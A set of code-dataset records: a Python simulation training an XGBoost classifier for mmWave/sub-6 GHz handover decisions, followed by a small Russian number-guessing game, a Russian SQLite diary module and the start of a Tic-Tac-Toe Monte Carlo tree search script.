'Sub-6 only':\n style = 'b-'\n elif data == 'Optimal':\n style = '^--'\n elif data == 'Proposed':\n# lw = 3.5\n style = '+-'\n else:\n style = '-'\n ax.plot(bin_edges[1:], cdf, style, linewidth=2, markevery=10)\n\n plt.legend(labels, loc=\"best\")\n \n if not legend:\n ax.get_legend().remove()\n \n plt.grid('both', linestyle='dashed')\n ax.set_ylim(0, 1)\n plt.xlabel('Throughput [Mbps]')\n plt.ylabel('Throughput CDF')\n plt.tight_layout() \n \n plt.savefig('figures/{}.pdf'.format(filename), format='pdf')\n matplotlib2tikz.save('figures/{}.tikz'.format(filename))\n\ndef plot_throughput_pdf(T):\n fig = plt.figure(figsize=(10.24, 7.68))\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 40\n matplotlib.rcParams['xtick.labelsize'] = 'small'\n matplotlib.rcParams['ytick.labelsize'] = 'small'\n matplotlib.rcParams['legend.fontsize'] = 'small'\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}'] \n \n labels = [] \n\n num_bins = 40\n for data in T:\n data_ = T[data]\n\n counts, bin_edges = np.histogram(data_, bins=num_bins, density=True)\n pdf = counts #np.cumsum(counts) / counts.sum()\n ax = fig.gca()\n if data == 'mmWave only':\n style = 'r-'\n labels.append(data)\n elif data == 'Sub-6 only':\n style = 'b-'\n labels.append(data)\n else:\n continue\n ax.plot(bin_edges[1:], pdf, style, linewidth=2)\n \n plt.legend(labels, loc=\"best\") \n plt.grid()\n plt.xlabel('Throughput [Mbps]')\n plt.ylabel('Throughput pdf')\n plt.tight_layout()\n plt.savefig('figures/throughputs_pdf_{}.pdf'.format(p_randomness), format='pdf')\n matplotlib2tikz.save('figures/throughputs_pdf_{}.tikz'.format(p_randomness))\n \ndef plot_primary(X,Y, title, xlabel, ylabel, filename='plot.pdf'):\n fig = plt.figure(figsize=(10.24,7.68))\n\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 40\n matplotlib.rcParams['xtick.labelsize'] = 'small'\n matplotlib.rcParams['ytick.labelsize'] = 'small'\n matplotlib.rcParams['legend.fontsize'] = 'small'\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}']\n \n plt.xlabel(xlabel)\n \n ax = fig.gca()\n ax.set_autoscaley_on(True)\n \n plot_, = ax.plot(X, Y, 'k^-') #, label='ROC')\n\n ax.set_ylabel(ylabel)\n \n plt.grid(True)\n fig.tight_layout()\n plt.savefig('figures/plot_{0}{1}.pdf'.format(p_randomness, filename), format='pdf')\n matplotlib2tikz.save('figures/plot_{0}{1}.tikz'.format(p_randomness, filename))\n \n# plt.show()\n\n##############################################################################\ndef train_classifier(df, r_training=0.8):\n dataset = df.copy()\n \n training, test = train_test_split(dataset, train_size=r_training, random_state=seed)\n \n eps = 1e-9\n X_train = training.drop('y', axis=1)\n y_train = training['y']\n X_test = test.drop('y', axis=1)\n y_test = test['y']\n\n w = len(y_train[y_train == 0]) / (eps + len(y_train[y_train == 1]))\n \n print('Positive class weight: {}'.format(w))\n \n classifier = xgb.XGBClassifier(seed=seed, learning_rate=learning_rate, n_estimators=1000, max_depth=8, scale_pos_weight=w, silent=True)\n #classifier.get_params().keys()\n \n # Hyperparameters\n alphas = np.linspace(0,1,2)\n lambdas = np.linspace(0,1,2)\n sample_weights = [0.5, 0.7]\n child_weights = [0, 10]\n objectives = ['binary:logistic']\n gammas = [0, 0.02, 0.04]\n \n hyperparameters = {'reg_alpha': alphas, 'reg_lambda': lambdas, 'objective': objectives, \n 'colsample_bytree': sample_weights, 'min_child_weight': child_weights, 'gamma': gammas}\n \n gs_xgb = GridSearchCV(classifier, hyperparameters, scoring='roc_auc', cv=K_fold) # k-fold crossvalidation\n gs_xgb.fit(X_train, y_train)\n clf = gs_xgb.best_estimator_\n \n y_pred = clf.predict(X_test)\n y_score = clf.predict_proba(X_test)\n\n try:\n roc_auc = roc_auc_score(y_test, y_score[:,1])\n print('The Training ROC AUC for this classifier is {:.6f}'.format(roc_auc))\n except:\n print('The Training ROC AUC for this classifier is N/A')\n\n return [y_pred, y_score, clf]\n\ndef predict_handover(df, clf, r_training):\n y_test = df['y']\n X_test = df.drop(['y'], axis=1)\n \n y_pred = clf.predict(X_test)\n y_score = clf.predict_proba(X_test)\n \n try:\n # Compute area under ROC curve\n roc_auc = roc_auc_score(y_test, y_score[:,1])\n print('The ROC AUC for this UE in the exploitation period is {:.6f}'.format(roc_auc))\n \n # Save the value\n f = open(\"figures/output_xgboost_{}.txt\".format(p_randomness), 'a')\n f.write('r_exploitation {0}, r_training {1}, ROC {2:.6f}\\n'.format(r_exploitation, r_training, roc_auc))\n f.close()\n\n y_pred=pd.DataFrame(y_pred)\n \n except:\n print('The ROC AUC for this UE in the exploitation period is N/A')\n y_pred = None\n roc_auc = None\n \n return y_pred, roc_auc\n##############################################################################\n \ndef get_beam_training_time(df, freq=28e9, horiz_beams=32, vertical_beams=8):\n return 10e-3 * horiz_beams * vertical_beams # 10 us in ms per beam.\n\ndef get_coherence_time(df, My, freq):\n # Returns beam coherence time in ms.\n c = 299792458 # speed of light\n \n BS_x, BS_y, BS_z = [235.504198, 489.503816, 6]\n np.random.seed(seed)\n\n n = df.shape[0] \n \n # Obtain D\n # alpha AoA equivalent random(0, pi) or 30 to 150 degrees\n\n D = ((df['lon'] - BS_x) ** 2 + (df['lat'] - BS_y) ** 2 + (df['height'] - BS_z) ** 2) ** 0.5\n Theta_n = 102 / My * math.pi/180 # beamwidth approximation for ULA ### 64 antennas in the aziumuth direction # 3 dB BW of antenna\n alpha = np.random.uniform(0, math.pi, size=n)\n T_B = D / (v_s * 1000/3600 * np.sin(alpha)) * Theta_n / 2.\n\n T_beam = np.array(T_B) * 1e3 # in ms\n T_beam = np.percentile(T_beam, 1) # take the 1st percentile of coherence\n \n if freq >= 28e9:\n print('INFO: mmWave mean channel coherence time is {} ms'.format(T_beam.mean()))\n return T_beam \n \n T_ofdm = np.ones(n) * c / (freq * v_s * np.sin(alpha) * 1000/3600) * 1e3 # in ms\n T_ofdm = np.percentile(T_ofdm, 1) \n \n T = np.minimum(T_ofdm, T_beam)\n\n print('INFO: sub-6 mean channel coherence time is {} ms'.format(T.mean()))\n return T\n\n#df_ = create_dataset() # only uncomment for the first run, when the channel consideration changes. Otherwise, no need.\ndf_ = pd.read_csv('dataset.csv')\n\ndf = df_.iloc[:max_users,:]\ndel df_\n\n# Feature engineering: add SNR to the computation:\nnoise_floor_35 = k_B * T * delta_f_35 * 1e3\nnoise_floor_28 = k_B * T * delta_f_28 * mmWave_BW_multiplier * 1e3 # in mW\n\nnoise_power_35 = 10 ** (Nf/10.) * noise_floor_35\nnoise_power_28 = 10 ** (Nf/10.) * noise_floor_28 \n\n# Instantaneous rates (Shannon)\ndf['Capacity_35'] = B_35*np.log2(1 + 10**(df['P_RX_35']/10.) / noise_power_35) / 1e6\ndf['Capacity_28'] = B_28*np.log2(1 + 10**(df['P_RX_28']/10.) / noise_power_28) / 1e6\n\ndf = df[['lon', 'lat', 'height', 'Capacity_35', 'Capacity_28']]\n\nuser_mask = np.random.binomial(1, p_randomness, size=max_users) # 0 == user is 3.5, 1 == user is mmWave.\n\n# Source and Target are instantaneous rates.\ndf.loc[user_mask==0, 'Source'] = df.loc[user_mask==0, 'Capacity_35']\ndf.loc[user_mask==1, 'Source'] = df.loc[user_mask==1, 'Capacity_28']\ndf.loc[user_mask==0, 'Target'] = df.loc[user_mask==0, 'Capacity_28']\ndf.loc[user_mask==1, 'Target'] = df.loc[user_mask==1, 'Capacity_35']\n\n# Compute the Effective Achievable Rates\ncoherence_time_sub6 = get_coherence_time(df, My=8, freq=3.5e9)\ncoherence_time_mmWave = get_coherence_time(df, My=64, freq=28e9) \n\n#plot_pdf(coherence_time_mmWave, 'mmWave', coherence_time_sub6, 'sub-6')\ncoherence_time_mmWave = np.percentile(coherence_time_mmWave, 1)\ncoherence_time_sub6 = np.mean(coherence_time_sub6)\n\ngap_duration_sub6 = gap_fraction * coherence_time_sub6\ngap_duration_mmWave = gap_fraction * coherence_time_mmWave\n\nbeam_training_penalty_mmWave = get_beam_training_time(df, freq=28e9, horiz_beams=8, vertical_beams=32)\nbeam_training_penalty_sub6 = get_beam_training_time(df, freq=2.1e9, horiz_beams=8, vertical_beams=8)\n\n# Write the formulas in Paper\ncoeff_sub6_no_ho = (coherence_time_sub6 - beam_training_penalty_sub6) / coherence_time_sub6\ncoeff_mmWave_no_ho = (coherence_time_mmWave - beam_training_penalty_mmWave) / coherence_time_mmWave\ncoeff_sub6_ho = (coherence_time_sub6 - beam_training_penalty_sub6 - gap_duration_sub6) / coherence_time_sub6\ncoeff_mmWave_ho = (coherence_time_mmWave - beam_training_penalty_mmWave - gap_duration_mmWave) / coherence_time_mmWave\n\ndf.to_csv('figures/dataset_rates_{}.csv'.format(p_randomness))\n\n##############################################################################\ndf['Source_is_3.5'] = (df['Source'] == df['Capacity_35']) + 0\ndf['Source_is_28'] = (df['Source'] == df['Capacity_28']) + 0\n\nexploit_indices = np.random.choice(df.shape[0], N_exploit, replace=False)\n\nsub_6_capacities = df.loc[exploit_indices, 'Capacity_35'].copy()\nmmWave_capacities = df.loc[exploit_indices, 'Capacity_28'].copy()\n\n# Change the order of columns to put \ncolumn_order = ['lon', 'lat', 'height', 'Source', 'Target', 'Source_is_3.5', 'Source_is_28']\ndf = df[column_order]\n\n##############################################################################\n# 1) Optimal algorithm\n##############################################################################\ndf_optimal = df.copy()\ndf_optimal_ = df.copy()\n\n# Now, apply the handover algorithm\n# and compute the Effective Achievable Rate but no penalty for handover\n\na = df_optimal_.loc[(df_optimal_['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho\nb = df_optimal_.loc[(df_optimal_['Source_is_3.5'] == 1), 'Target'] * coeff_mmWave_no_ho\nc = df_optimal_.loc[(df_optimal_['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho\nd = df_optimal_.loc[(df_optimal_['Source_is_28'] == 1), 'Target'] * coeff_sub6_no_ho\n\n# The NaNs here are due to p_randomness values.\ndf_optimal_ = pd.DataFrame([a, b, c, d]).T\ndf_optimal_.fillna(0, axis=1, inplace=True)\n\n# Choose the max rate regardless\ndf_optimal.loc[:,'Capacity_Optimal'] = df_optimal_.apply(np.max, axis=1)\n \n# Sample r_exploit data randomly from df_optimal\nbenchmark_data_optimal = df_optimal.iloc[exploit_indices, :]\n\ndel df_optimal, a, b, d, df_optimal_\n\n##############################################################################\n# 2) Legacy algorithm\n##############################################################################\ndf_legacy = df.copy()\n\n# Handover is based on raw Shannon rates.\ndf_legacy.loc[:, 'HO_requested'] = (df_legacy.loc[:, 'Source'] < request_handover_threshold) + 0\ndf_legacy.loc[:, 'y'] = (df_legacy.loc[:,'Target'] >= df_legacy.loc[:,'Source']) + 0\n\n# No handover request means no handover granted\ndf_legacy.loc[df_legacy['HO_requested'] == 0, 'y'] = 0\n\n# Now, apply the handover algorithm\n# and compute the Effective Achievable Rate\n\n# Based on x_hr, if there was no handover, put the source effective rates back\ndf_legacy.loc[(df_legacy['HO_requested'] == 0) & (df_legacy['Source_is_3.5'] == 1), 'Capacity_Legacy'] = df_legacy.loc[(df_legacy['HO_requested'] == 0) & (df_legacy['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho # no handover requested.\ndf_legacy.loc[(df_legacy['HO_requested'] == 0) & (df_legacy['Source_is_28'] == 1), 'Capacity_Legacy'] = df_legacy.loc[(df_legacy['HO_requested'] == 0) & (df_legacy['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho # no handover requested.\n\n# Handover requested, but denied. Therefore, the source rate penalized by the gap\ndf_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 0) & (df_legacy['Source_is_3.5'] == 1), 'Capacity_Legacy'] = df_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 0) & (df_legacy['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_ho # handover requested but denied, the throughput is the source.\ndf_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 0) & (df_legacy['Source_is_28'] == 1), 'Capacity_Legacy'] = df_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 0) & (df_legacy['Source_is_28'] == 1), 'Source'] * coeff_mmWave_ho # handover requested but denied, the throughput is the source.\n\n# Handover requested, and granted. Therefore, the target rate penalized by the gap\ndf_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 1) & (df_legacy['Source_is_3.5'] == 1), 'Capacity_Legacy'] = df_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 1) & (df_legacy['Source_is_3.5'] == 1), 'Target'] * coeff_sub6_ho # handover requested and granted, the throughput is the target.\ndf_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 1) & (df_legacy['Source_is_28'] == 1), 'Capacity_Legacy'] = df_legacy.loc[(df_legacy['HO_requested'] == 1) & (df_legacy['y'] == 1) & (df_legacy['Source_is_28'] == 1), 'Target'] * coeff_mmWave_ho # handover requested and granted, the throughput is the target.\n##\n\n# Sample r_exploit data randomly from df_legacy\nbenchmark_data_legacy = df_legacy.iloc[exploit_indices, :]\n\ndel df_legacy\n\n##############################################################################\n# 3) Blind handover algorithm\n##############################################################################\ndf_blind = df.copy()\n\ndf_blind['HO_requested'] = pd.DataFrame((df_blind.loc[:,'Source'] <= request_handover_threshold), dtype=int)\ndf_blind['y'] = 1\n\n# No handover request means no handover granted\ndf_blind.loc[df_blind['HO_requested'] == 0, 'y'] = 0\n\n# Now, apply the handover algorithm\n# and compute the Effective Achievable Rate\n#df_blind.loc[(df_blind['y'] == 0) & (df_blind['Source_is_3.5'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['y'] == 0) & (df_blind['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho # no handover, the throughput is the source.\n#df_blind.loc[(df_blind['y'] == 0) & (df_blind['Source_is_28'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['y'] == 0) & (df_blind['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho # no handover, the throughput is the source.\n\n# Based on x_hr, if there was no handover, put the source effective rates back\ndf_blind.loc[(df_blind['HO_requested'] == 0) & (df_blind['Source_is_3.5'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['HO_requested'] == 0) & (df_blind['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho # no handover, the throughput is the source but no gap.\ndf_blind.loc[(df_blind['HO_requested'] == 0) & (df_blind['Source_is_28'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['HO_requested'] == 0) & (df_blind['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho # no handover, the throughput is the source but no gap.\n\n# Handover requested, but denied. Therefore, the source rate penalized but no gap\ndf_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 0) & (df_blind['Source_is_3.5'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 0) & (df_blind['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho # no handover, the throughput is the source but no gap.\ndf_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 0) & (df_blind['Source_is_28'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 0) & (df_blind['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho # no handover, the throughput is the source but no gap.\n\n# Handover requested, and granted. Therefore, the target rate penalized but no gap\ndf_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 1) & (df_blind['Source_is_3.5'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 1) & (df_blind['Source_is_3.5'] == 1), 'Target'] * coeff_mmWave_no_ho # blind handover, the throughput is the target but no gap.\ndf_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 1) & (df_blind['Source_is_28'] == 1), 'Capacity_Blind'] = df_blind.loc[(df_blind['HO_requested'] == 1) & (df_blind['y'] == 1) & (df_blind['Source_is_28'] == 1), 'Target'] * coeff_sub6_no_ho # blind handover, the throughput is the target but no gap.\n\n##\n\n# Sample r_exploit data randomly from df_blind\nbenchmark_data_blind = df_blind.iloc[exploit_indices, :]\n\ndel df_blind\n\n##############################################################################\n# 4) Proposed algorithm\n##############################################################################\n\n# The height column must be deleted here before prediction is made\nheight = df['height']\ndf_proposed = df.drop(['height', 'Source_is_28'], axis=1) # delete the 28 column since it is equal to not 3.5.\n\ndf_proposed.loc[:, 'HO_requested'] = (df_proposed.loc[:, 'Source'] < request_handover_threshold) + 0\ndf_proposed.loc[:, 'y'] = (df_proposed.loc[:,'Target'] >= df_proposed.loc[:,'Source']) + 0\n\n# No handover request means no handover granted\ndf_proposed.loc[df_proposed['HO_requested'] == 0, 'y'] = 0\n\nif (p_randomness == 0 or p_randomness == 1):\n df_proposed = df_proposed.drop(['Source_is_3.5'], axis=1) # these two values will make the column of a single value.\n\n# Use this for the exploitation\ntrain_valid, benchmark_data_proposed = train_test_split(df_proposed, test_size=r_exploitation, random_state=seed)\n\n# The training and validation data get the infinity threshold (always request).\ntrain_valid['HO_requested'] = 1\n\ntrain_indices = pd.Int64Index(np.arange(df.shape[0])).difference(exploit_indices)\ntrain_valid = df_proposed.iloc[train_indices, :]\n\nbenchmark_data_proposed = df_proposed.iloc[exploit_indices, :]\n\nroc_graphs = pd.DataFrame()\nmisclass_graphs = pd.DataFrame()\n\nroc_auc_values = []\nmisclass_error_values = []\n\nmin_r_training = 1\nmin_score = np.inf\nbest_clf = None\nX = [1e-3,5e-3,7e-3,1e-2,3e-2,5e-2,7e-2,1e-1,3e-1,0.4,5e-1,7e-1] # note we removed 3e-3.\nfor r_t in X:\n try:\n [y_pred, y_score, clf] = train_classifier(train_valid, r_t)\n y_pred_proposed, score = predict_handover(benchmark_data_proposed, clf, r_t)\n y_score_proposed = clf.predict_proba(benchmark_data_proposed.drop(['y'], axis=1))\n y_test_proposed = benchmark_data_proposed['y']\n _, mu = get_misclassification_error(y_test_proposed, y_pred_proposed, y_score_proposed)\n\n if (mu < min_score):\n min_score = mu\n min_r_training = r_t\n best_clf = clf\n \n roc_auc_values.append(score)\n misclass_error_values.append(mu)\n \n roc_graphs = pd.concat([roc_graphs, pd.DataFrame(roc_auc_values)], axis=1)\n misclass_graphs = pd.concat([misclass_graphs, pd.DataFrame(misclass_error_values)], axis=1)\n \n except:\n roc_auc_values.append(np.nan)\n misclass_error_values.append(np.nan)\n pass\n\nroc_graphs.to_csv('figures/roc_output_{}.csv'.format(p_randomness), index=False)\nmisclass_graphs.to_csv('figures/misclass_output_{}.csv'.format(p_randomness), index=False)\n\n# Now generate data with the best classifier.\ny_pred_proposed, _ = predict_handover(benchmark_data_proposed, best_clf, min_r_training)\ny_score_proposed = best_clf.predict_proba(benchmark_data_proposed.drop(['y'], axis=1))\ny_test_proposed = benchmark_data_proposed['y']\n\n# Put back the height column\nbenchmark_data_proposed['height'] = height\n\n# Put back the Source data\nbenchmark_data_proposed['Source_is_3.5'] = df.loc[benchmark_data_proposed.index, 'Source_is_3.5']\nbenchmark_data_proposed['Source_is_28'] = df.loc[benchmark_data_proposed.index, 'Source_is_28']\n\n# Penalize the throughput rates aka Effective Achievable Rate\n# Use the same formula as the blind formula\n\n# Based on x_hr, if there was no handover, put the source effective rates back\nbenchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 0) & (benchmark_data_proposed['Source_is_3.5'] == 1), 'Capacity_Proposed'] = benchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 0) & (benchmark_data_proposed['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho # no handover, the throughput is the source but no gap.\nbenchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 0) & (benchmark_data_proposed['Source_is_28'] == 1), 'Capacity_Proposed'] = benchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 0) & (benchmark_data_proposed['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho # no handover, the throughput is the source but no gap.\n\n# Handover requested, but denied. Therefore, the source rate penalized but no gap\nbenchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 0) & (benchmark_data_proposed['Source_is_3.5'] == 1), 'Capacity_Proposed'] = benchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 0) & (benchmark_data_proposed['Source_is_3.5'] == 1), 'Source'] * coeff_sub6_no_ho # no handover, the throughput is the source but no gap.\nbenchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 0) & (benchmark_data_proposed['Source_is_28'] == 1), 'Capacity_Proposed'] = benchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 0) & (benchmark_data_proposed['Source_is_28'] == 1), 'Source'] * coeff_mmWave_no_ho # no handover, the throughput is the source but no gap.\n\n# Handover requested, and granted. Therefore, the target rate penalized but no gap\nbenchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 1) & (benchmark_data_proposed['Source_is_3.5'] == 1), 'Capacity_Proposed'] = benchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 1) & (benchmark_data_proposed['Source_is_3.5'] == 1), 'Target'] * coeff_mmWave_no_ho # blind handover, the throughput is the target but no gap.\nbenchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 1) & (benchmark_data_proposed['Source_is_28'] == 1), 'Capacity_Proposed'] = benchmark_data_proposed.loc[(benchmark_data_proposed['HO_requested'] == 1) & (benchmark_data_proposed['y'] == 1) & (benchmark_data_proposed['Source_is_28'] == 1), 'Target'] * coeff_sub6_no_ho # blind handover, the throughput is the target but no gap.\n##\n\n##############################################################################\n# Plotting\n##############################################################################\n\nplot_primary(X, roc_auc_values, 'ROC vs Training', r'$r_\\text{training}$', 'ROC AUC', filename='roc_vs_training_{}.pdf'.format(p_randomness))\nplot_primary(X, 100*np.array(misclass_error_values), '$\\mu vs Training', r'$r_\\text{training}$', r'$\\mu$ [\\%]', filename='misclass_vs_training_{}.pdf'.format(p_randomness))\nplot_confusion_matrix(y_test_proposed, y_pred_proposed, y_score_proposed)\n\n# Put the coherence time penalty for no handover regardess\nsub_6_capacities.iloc[:] *= coeff_sub6_no_ho\nmmWave_capacities.iloc[:] *= coeff_mmWave_no_ho\n\nbenchmark_data_optimal = benchmark_data_optimal.reset_index().drop(['index'], axis=1)\nbenchmark_data_legacy = benchmark_data_legacy.reset_index().drop(['index'], axis=1)\nbenchmark_data_blind = benchmark_data_blind.reset_index().drop(['index'], axis=1)\nbenchmark_data_proposed = benchmark_data_proposed.reset_index().drop(['index'], axis=1)\nsub_6_capacities = sub_6_capacities.reset_index().drop(['index'], axis=1)\nmmWave_capacities = mmWave_capacities.reset_index().drop(['index'], axis=1)\n\nbenchmark_data_proposed.loc[:,'y_true'] = benchmark_data_proposed['y'].copy()\nbenchmark_data_proposed['y'] = y_pred_proposed\n\n# Summaries\nf = open('figures/handover_metrics_{}.txt'.format(p_randomness), 'w')\nfor policy in ['proposed', 'legacy', 'blind']:\n d_ = eval('benchmark_data_{}'.format(policy))\n f.write('Policy {0} -- number of handovers requested in exploitation phase: {1:.0f}\\n'.format(policy, d_['HO_requested'].sum()))\n f.write('Policy {0} -- number of handovers granted in exploitation phase: {1:.0f}\\n'.format(policy, d_['y'].sum()))\nf.close()\n \ndata = pd.concat([benchmark_data_optimal['Capacity_Optimal'], benchmark_data_proposed['Capacity_Proposed'], benchmark_data_proposed['HO_requested'], benchmark_data_legacy['Capacity_Legacy'], benchmark_data_blind['Capacity_Blind'], sub_6_capacities['Capacity_35'], mmWave_capacities['Capacity_28']], axis=1, ignore_index=True)\ndata.columns = ['Optimal', 'Proposed', 'HO_requested', 'Legacy', 'Blind', 'Sub-6 only', 'mmWave only']\ndata.to_csv('figures/dataset_post_{}.csv'.format(p_randomness), index=False)\n\n#plot_throughput_pdf(data)\nplot_throughput_cdf(data[['Sub-6 only', 'mmWave only']], 'throughput_cdf_{}'.format(p_randomness))\n\ndiff = pd.DataFrame(data = (abs(data['mmWave only'] - data['Sub-6 only'])), columns=['Difference'])\nplot_throughput_cdf(diff, 'diff_cdf_{}'.format(p_randomness), legend=False)\n\n# 3D Plot pdf/CDF\nplot_joint_pdf(data['Sub-6 only'], data['mmWave only'])\nplot_joint_cdf(data['Sub-6 only'], data['mmWave only'])\n\ndata_policies = data[['Optimal', 'Proposed', 'Legacy', 'Blind']]\ndata_policies.dropna(inplace=True)\nplot_throughput_cdf(data_policies, 'throughputs_{}'.format(p_randomness))\n","sub_path":"main_xgboost.py","file_name":"main_xgboost.py","file_ext":"py","file_size_in_byte":43854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"140486430","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nimport random\n\ndef jd(a):\n p = random.randint(1,4)\n if a == p:\n return \"Вы угадали\"\n elif a < p:\n return \"Мало\"\n else:\n return \"Много\"\n\na = int(input())\njd(a)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"dz4/if_random_game.py","file_name":"if_random_game.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"187492432","text":"# -*- coding: utf-8 -*-\n\nimport sqlite3, sys, json\n\nconn = ''\n\ndef connect(db_name = ''):\n def connect(db_name = None):\n if db_name is None:\n db_name = ':memory:' # создание базы в оперативной памяти, существует пока открыто соединение\n conn = sqlite3.connect(db_name)\n # хитрая логика\n conn.row_factory = dict_factory # ссылка на функцию\n return conn\n\ndef dict_factory(cursor, row):\n d = {}\n for i, col in enumerate(cursor.description):\n d[col[0]] = row[i]\n return d\n\ndef initialize(conn):\n with conn:\n cursor = conn.executescript('''\n CREATE TABLE IF NOT EXISTS diary(\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n name TEXT NOT NULL DEFAULT '',\n description TEXT NOT NULL,\n date DATETIME NOT NULL , \n status TEXT NOT NULL\n )\n ''')\n\n cursor2 = conn.execute('''\n INSERT INTO diary(name, description, date, status) \n VALUES ('покупка', 'купить молоко', '07.03.2017 19:05', '0') \n ''')\n \n\n\ndef show_menu():\n print('''\n Ежедневник. Выберите действие:\n \n 1. Вывести список задач'\n 2. Добавить задачу'\n 3. Отредактировать задачу'\n 4. Завершить задачу'\n 5. Начать задачу сначала'\n 6. Выход'\n \n Введите число:\n ''')\n\n\ndef show_message(func):\n def wrapper(*args, **kwargs):\n rez = func(*args, **kwargs)\n for i in rez:\n values = list(i.values())\n print('{} {} {} {} {}'.format(values[0], values[1], values[2], \n values[3], values[4]))\n return wrapper\n\n@show_message\ndef show_diary(status = '0'):\n with conn:\n cursor = conn.execute('''\n SELECT * FROM diary WHERE status=?\n ''', (status,))\n return cursor.fetchall()\n\ndef add_activity():\n st = '0'\n print('Введите название задачи')\n name = input()\n print('Введите описание задачи')\n description = input()\n print('Введите дату')\n date = input()\n with conn:\n cursor = conn.execute('''\n INSERT INTO diary (name, description, date, status) \n VALUES (?,?,?,?) \n ''', (name, description, date, st))\n\n\ndef change_activity():\n print('Введите id задачи')\n id_task = input()\n print('Введите название')\n name = input()\n print('Введите описание')\n description = input()\n print('Введите дату')\n date = input()\n with conn:\n cursor = conn.execute('''\n UPDATE diary SET name=?, description=?, date=?, status=? WHERE id=?\n ''', (name, description, date, '0', id_task))\n\ndef change_status(rez = '', status = ''):\n show_diary(status)\n print('Укажите id задачи')\n id_task = input()\n with conn:\n cursor = conn.execute('''\n UPDATE diary SET status=? WHERE id=?\n ''', (rez, id_task))\n\ndef finish_activity():\n change_status(rez = '1', status = '0')\n \ndef return_activity():\n change_status(rez = '0', status = '1')\n\ndef action_exit():\n conn.close()\n sys.exit(0)","sub_path":"HW5/diary/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"214467120","text":"from __future__ import print_function\nfrom Tic_Tac_Toe import TicTacToe\nfrom Node import Node\nimport MCTS\nimport copy as cp\n\ndef main():\n BoardObj = TicTacToe()\n currNode = Node(expanded=False, visited=True, TotalSimualtionReward=0, totalNumVisit=1, TicTacToe=BoardObj,parent=None)\n print(\"Initial Board setting\")\n currNode.TicTacToe.print_board()\n while not currNode.Terminal:\n if currNode.TicTacToe.moveCnt & 1:\n x = int(raw_input('Enter row position\\n'))\n y = int(raw_input('Enter column position\\n'))\n TicTacToeObj = cp.deepcopy(currNode.TicTacToe)\n try:\n TicTacToeObj.make_move(x,y)\n except:\n continue\n nextNode = currNode.compareTo(TicTacToeObj.board)\n if nextNode is None:\n nextNode = Node(expanded=False, visited=True, TotalSimualtionReward=0, totalNumVisit=1, TicTacToe=TicTacToeObj,parent=None)\n else:\n nextNode = MCTS.MonteCarloTreeSearch(currNode, 0.1)\n print(\"After {} Move\".format(nextNode.TicTacToe.moveCnt))\n print(nextNode.TotalSimualtionReward)\n 